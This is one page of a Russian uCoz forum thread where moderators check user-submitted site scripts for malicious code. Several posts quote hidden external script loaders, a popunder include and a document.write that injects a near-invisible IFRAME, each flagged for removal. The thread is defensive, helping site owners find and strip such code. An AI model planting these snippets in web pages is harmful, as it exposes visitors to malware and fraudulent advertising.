Если вы решили добавить к себе на сайт скрипт - Страница 4

Страница 4 из 26 « 1 2 3 4 5 6 … 25 26 »
Модератор форума: Yuri_G

Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Если вы решили добавить к себе на сайт скрипт (скрипты для uCoz)

Если вы решили добавить к себе на сайт скрипт

Модератор форума

Сообщение # 1 | 23:24:25 02 Дек 2010

...ошибка новичка, пихать всё на сайт ©Prifect

С помощью различных скриптов можно значительно расширить функциональность и внешний вид сайта. При правильном и рациональном использовании скриптов можно сделать свой сайт удобным, красивым и неповторимым. Можно писать скрипты и элементы дизайна самостоятельно - в таких случаях практически не возникает проблем. Человек очень четко представляет что ему нужно и как все должно функционировать. Но чаще всего происходит так, что нужные и не очень скрипты, находятся в интернете и устанавливаются на сайт.

Скрипты для uCoz найденные в открытом доступе

Существует множество сайтов раздающих скрипты и элементы дизайна для сайтов системы uCoz. Как правило это уже готовые к использованию скрипты, которые можно просто скопировать из сообщения и вставить к себе на сайт. Как правило так и делают: копируют и вставляют, что является большой ошибкой.

Если в готовом скрипте есть графика в виде картинок, то всю такую графику (то есть картинки) нужно скачать к себе на компьютер, а потом залить на сайт через файловый менеджер и перепрописать все сторонние ссылки на картинки на свои (скопированные из файлового менеджера)

В итоге

Code

src="http://vaseapupkin.ucoz.ru/term/images/demo.png"

должно превратиться в

Code

src="http://mysite.ucoz.ru/term/images/demo.png"

Так вы не будете зависеть от работы сайта vaseapupkin.ucoz.ru, а так же от причуд администратора этого сайта, который может просто удалить эти картинки со своего сайта или заменить их на другие

ВЫВОД: Подгружать графику находящуюся на чужих сайтах и залитую на сторонние сайты используя внешние ссылки не рекомендуется!

Если в готовом коде есть необходимость в установке javascript массива вида

Code

то копировать его в том виде как он раздается категорически не рекомендуется. javascript обязательно нужно залить к себе на сайт через файловый менеджер в отдельную папку.
Уважающие себя сайты раздают такие массивы на скачивание. Файл можно скачать к себе на компьютер, открыть в блокноте например, проверить и залить к себе на сайт через файловый менеджер. Если скачивание скрипта не дается, то можно открыть в браузере адрес скрипта http://vaseapupkin.ucoz.ru/demo.js, на открывшейся странице щелкнуть правой кнопкой мыши и нажать на сохранить как..., так вы скачаете файл для последующей закачки к себе на сайт через файловый менеджер. Файлы javascript нужно закачивать в папку созданную в файловом менеджере

В итоге

Code

должно превратиться в

Code

Так вы не будете зависеть от работы сайта с которого подгружался бы ваш javascript, а так же не будете зависеть от степени порядочности владельца сайта на который загружен javascript, ведь файл можно всегда изменить.
Особенно хочу отметить то, что если вы не понимаете работу javascript кода который берете или не понимаете сам код, то лучше воздержаться от установки к себе на сайт кода который вы не понимаете!

ВЫВОД: Подгружать javascript со сторонних сайтов категорически не рекомендуется!!!

Осторожно IFRAME !

IFRAME считается потенциально опасным кодом, поэтому его использование ограничено. Система uCoz использует IFRAME для вывода рекламного баннера и для трансляции мини-чата. Эти IFRAME безопасны! Так же с помощью IFRAME работают некоторые гаджеты и виджеты.

IFRAME так же может использоваться некоторыми партнерскими программами и рекламными сетями. Так же с помощью IFRAME можно вставлять видео на сайт с YouTube и Контакта. Некоторые сайты раздают свои информеры контента с помощью IFRAME. Если вы полностью доверяете сайтам раздающим в своем коде IFRAME и это необходимо для трансляции или контента или рекламных блоков или информеров или видео, то можете добавлять, но только из проверенных источников, и нужно помнить, что чем меньше IFRAME на сайте - тем лучше.

Если вы берёте в открытом доступе скрипт или элемент дизайна для uCoz, и в нем есть код типа

Code

то такой скрипт или элемент дизайна брать, а особенно копировать и ставить к себе на сайт категорически нельзя! Вы должны понимать, что такого вида кодом, вы транслируете у себя на сайте совершенно чужой сайт, на котором находится неизвестно что. Обычно такие IFRAME вставляются в скрипты и в элементы дизайна злоумышленниками, которые посредством таких открытых раздач, заодно раздают элементы своих мошеннических сетей.
Установив скрипт с подобным кодом внутри, к себе на сайт, вы можете столкнуться с такими неприятностями как:

1) реакция аллерта вашего антивируса на ваш же сайт
2) блокировка вашего сайта поисковиком с наложением фильтра с табличкой и пометкой в выдаче, о том, что ваш сайт может нанести вред компьютеру

ВЫВОД: IFRAME потенциально опасный код, использование которого на сайте должно быть строго ограничено! Если вы видите код в котором присутствует IFRAME и не понимаете его назначения, то устанавливать к себе на сайт подобный код не рекомендуется!
Если в открытой раздаче скриптов и элементов дизайна для uCoz присутствует IFRAME, то копировать такой код и устанавливать к себе на сайт категорически не рекомендуется!

В заключении хочется сказать, что если вы совсем не понимаете принцип работы того или иного скрипта, и если совсем не понимаете код который копируете, то лучше воздержаться от установки непонятного вам скрипта к себе на сайт. Неразумное обращение со скриптами обычно приводит к очень тяжелым последствиям.

Если вы занимаетесь сбором скриптов и элементов дизайна, то эта памятка для вас! В этой теме вы всегда можете подать запрос на проверку найденного скрипта или элемента дизайна на наличие вредоносного кода и спама. В этой теме не обсуждается установка, проблемы работоспособности и поиск скриптов. Только проверка на вредоносный код и спам!

koliabelarus

Сообщений: 2

Репутация: 0

Сообщение # 46 | 21:54:57 20 Май 2011

Привет всем! Проверте пожалуйста скрипт:

<?if($USER_ID$=1)?><img src="http://igc.moy.su/stata/admin.gif" border="0"><?endif?>

fflesh

Сообщений: 1784

Репутация: 1314

Сообщение # 47 | 22:45:52 20 Май 2011

koliabelarus,

Quote (koliabelarus)

Привет всем! Проверте пожалуйста скрипт:

Картинка чиста, как слеза )
Всё в порядке.

Всё написанное выше - моё личное мнение и на абсолютную правоту не претендует.
Есть вопросы лично ко мне - пиши сюда: http://likbezz.ru/forum/8

Boroda2501

Сообщений: 1

Репутация: 0

Сообщение # 48 | 18:15:45 05 Июн 2011

Здравствуйте!
на днях услышал страшное слова "iframe" и на тебе, получи фашист гранату:
А. проверил свои сайты на ентот ифрэйм (проверял тут - удалено ) и на 1 сайте (http://well-style.ucoz.ru/) выдало наличие злополучного.
проверил в гугле и яндексе - они на мой сайт не ругаются как на зараженный или вредоносный.
Б. + ко всему зашел в админку и увидел "[color=red]Ваш сайт исключен из рейтинга вследствие нарушения правил." может из-за того же iframe?

1. Подскажите как найти и убрать ифрэйм?
2. как узнать за что был исключен сайт и как можно это исправить?
Заранее всем благодарен за помощь и подсказки!!!

webanet

Сообщений: 24067

Репутация: 4985

Сообщение # 49 | 21:40:55 05 Июн 2011

Boroda2501, на указанном сайте у вас два левых ифрейма. один - это револьверовы карты. второй это ваша сомнительная реклама
ифрейм вшит вот в это дело

Code

нужна вам такая сомнительная партнерка на главной странице которой только в одном блоке я нашла 2 орфографические ошибки и пару опечатков это ваше дело. так же ваше дело что откручивать через это дело на вашем сайте. не знаю насколько жестко модерируется то что там откручивается, но если вдруг ваш антивирус запищит, вспомните про эту рекламу

Quote

Ваш сайт исключен из рейтинга вследствие нарушения правил

нет. к ифремам вашим это не относится, а относится к неправильному оформлению описания сайта. вам нужно обратиться в бесплатную тех. поддержку за разъяснениями

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/

Маруська8329

Сообщений: 13

Репутация: -7

Сообщение # 50 | 12:14:15 27 Июн 2011

Здравствуйте!! Хочу добавить на свой сайт мини профиль. Скачала скрипт.

Code

<div align="center"><strong>$WDAY$ <br> $DATE$ <br> $TIME$</strong>
<br>
<?if($USER_AVATAR_URL$)?><img class="userAvatar" title="$USERNAME$" src="$USER_AVATAR_URL$" border="0"><?else?><script type="text/javascript" src="http://r1p.pp.ua/1.js
"></script><?if($USER_LOGGED_IN$)?><img class="userAvatar" title="$USERNAME$" src="http://i029.radikal.ru/0804/cb/8cc27a1c0e73.gif" border="0"><?else?><img class="userAvatar" title="$USERNAME$" src="http://i021.radikal.ru/0804/53/f5b4265aa726.gif" border="0"><?endif?><?endif?>

<?if($USER_LOGGED_IN$)?>

<div align="center">Вы вошли как: <strong>$USERNAME$</strong> <br />
IP Адрес: <strong>$IP_ADDRESS$</strong> <br />
Группа: <strong>$USER_GROUP$</strong> <br />
Личных сообщений: <strong>$UNREAD_PM$</strong></p>

<input class="buttonprofile" type="button" onclick="document.location.href='/index/8'; return false;" value="Профиль">

<input class="buttonprofile" type="button" onclick="window.open('/index/14','pmw','scrollbars=1,top=0,left=0,resizable=1,width=680,height=350'); return false;" value="ЛС">

<input class="buttonprofile" type="button" onclick="document.location.href='/index/10'; return false;" value="Выход">
</div>

<?if($IS_NEW_PM$)?><script type="text/javascript">function flashit(id,cl){var c=document.getElementById(id);if (c.style.color=='red'){c.style.color=cl;}else {c.style.color='red';}}setInterval("flashit('upml2','')",500)</script><?endif?>

<script language=javascript type=text/javascript>
function openOnClick(client_type)
{
if(client_type=="mail")clientWindow = window.open("$PM_URL$","pmw","scrollbars=1,top=0,left=0,resizable=1,width=850,height=350") || alert("Отключите блокировку всплывающих окон!");
if(client_type=="send")clientWindow = window.open("/index/14-999-0-1","pms","scrollbars=1,top=0,left=0,resizable=1,width=850,height=350") || alert("Отключите блокировку всплывающих окон!");
if(client_type=="options")clientWindow = window.open("/index/11","options","scrollbars=1,top=0,left=0,resizable=1,width=680,height=350") || alert("Отключите блокировку всплывающих окон!");
if(client_type=="users")clientWindow = window.open("$USERS_LIST_URL$","users","scrollbars=1,top=0,left=0,resizable=1,width=680,height=350") || alert("Отключите блокировку всплывающих окон!");
if(client_type=="rules")clientWindow = window.open("/rules.html","rules","scrollbars=1,top=0,left=0,resizable=1,width=680,height=350") || alert("Отключите блокировку всплывающих окон!");
}
</script>
<?else?>
<br> $LOGIN_FORM$
<?endif?></div>

Посмотрите пожалуйста все ли нормально.

Сообщение отредактировал Маруська8329 - Понедельник, 27 Июн 2011, 12:14:58

Dmitry

Сообщений: 2154

Репутация: 1057

Сообщение # 51 | 12:18:15 27 Июн 2011

Маруська8329,

Code

уберите.

NFSxRacer

Репутация: 2

Сообщение # 52 | 15:40:09 22 Июл 2011

Cкажите данная форма поиска нормальная?

Code

это css

Code

input{font-family:verdana,arial,helvetica;font-size:8pt;vertical-align:middle;}
.search_background {background:url(/DesignNew/Images/search_background.png) no-repeat;border:none;color:#ffffff;margin:0;padding-bottom:10px;padding-left:10px;padding-top:10px;width:200px;}

Картинки подгружаются с моего сайта а не со сторонних

Сообщение отредактировал NFSxRacer - Пятница, 22 Июл 2011, 16:01:17

olegsuv

Сообщений: 1365

Репутация: 127

Сообщение # 53 | 15:51:16 22 Июл 2011

"данная форма поиска нормальная". Сказал.

Любые работы по:
- Javascript, jQuery, HTML, CSS
- Верстке макетов и установке их на сайты
- Нестандартным решениям

tvinsen

Сообщений: 3

Репутация: 2

Сообщение # 54 | 23:25:11 04 Авг 2011

Здравствуйте!
Подскажите пожалуйста, что не так в моем коде, просто при попытке вставить в шаблон "Страница материала и комментариев к нему" ucoz ругается "Найден код порнографической баннерной сети или партнерской программы.
Размещение на сайте порно-рекламы или popUp/popUnder рекламы запрещено. Нарушение правила влечет блокировку сайта."

webanet

Сообщений: 24067

Репутация: 4985

Сообщение # 55 | 23:30:43 04 Авг 2011

tvinsen, адрес сайта дайте. и код какого именно шаблона вы пытаетесь сохранить?

Quote

пока это смело удаляйте

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/

tvinsen

Сообщений: 3

Репутация: 2

Сообщение # 56 | 23:35:53 04 Авг 2011

адрес сайта: alprezentation.ucoz.ru
шаблон: Xbox 360

webanet

Сообщений: 24067

Репутация: 4985

Сообщение # 57 | 23:40:11 04 Авг 2011

tvinsen, выделенное красным удалить. ищите блок заказ презентации в его содержимом

Quote

<div class="block"><div class="dtop"><div class="dbtm">
<h3 class="dtitle">Заказ презентации</h3>
<div class="dcont">
<div align="center"><a href="http://alprezentation.ucoz.ru/index/zakaz_prezentacii/0-6"><img src="/allprez_banner.gif" alt=""></a></div>
<script language='javascript' type='text/javascript' src='http://tvincen.popunder.ru/out.php?sid=103012'></script>
</div>
</div></div></div>

а вообще шаблон грязный и до ужаса заспамленный

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/

xDREEGISTx

Сообщений: 1

Репутация: 0

Сообщение # 58 | 04:41:09 20 Авг 2011

Доброго времени суток!
Я владелец сайта http://nfs-tyrnir.moy.su/
Мой сайт блокирует браузер (Google chrome) - но антивирус молчит (Kaspersky internet security 2011 - лицензия и естественно базы постоянно обнавляются) Мой компьютер чист, проверил самой глубокой очисткой! проверил сайт другими онлайн сервисами , показало что чист!
Google chrome пришет что сайт подгружается с другого сайта (сейчас не вспомню т.к. гугл такую табличку показывает всего 1 раз в сутки)
я изменил пароль к FTP админке - удалил с сайта плеер (причина уж точно не внём - создал я его на оффициальном сайте http://www.playmju.ru/ он стоял года полтора и никаких нареканий)
И больше всего раздражает то что я даже не знаю где он находится! перерыл вроде бы всё но ничего не нашёл...Заходил на тот сайт, который писался в гугле, он полностью чист, т.е. пустая страница - на нём ничего нет! ни картинок ни надписей, совсем ничего!

Я уже не знаю как избавится от этого вируса - даже шаблон восстанавливал к истокам, ничего не дало!
Помогите пожалуйста!

Miss_Esq

Сообщений: 13859

Репутация: 4159

Уровень замечаний:

Сообщение # 59 | 09:54:16 20 Авг 2011

xDREEGISTx, Ну а этот скрипт ??
<script type="text/javascript" src="http://top.nfsunlimited.ru/js_top_script/script_for_29.js">
Его содержание вызывает некоторые опасения в чистоплотности намерений при таких то параметрах ..
document.write('<IFRAME src=http://top.nfsunlimited.ru/dir/1-1-0-29 width=0.1 height=0.1 frameBorder=0 scrolling=no></IFRAME>');
Да и вообще Iframe мало кому из поисковиков нравится ...

Quote

Заходил на то ..... сем ничего!

Это ещё ни о чём не говортит и тем более о его чистоте , может имеется ввиду каскадность ссылок в конце которой и есть опасный сайт .....

geometriya ISO 3166-2 DEE

Сообщение отредактировал Miss_Esq - Суббота, 20 Авг 2011, 09:56:55

Filo$oF

Сообщений: 1

Репутация: 0

Сообщение # 60 | 21:32:27 07 Сен 2011

Здравствуйте! Хочу добавить на сайт мини профель, нашёл вот такой вот скрипт:

Всё ли в нём нормально?

Страница 4 из 26
«
1
2
3
4
5
6
…
25
26
»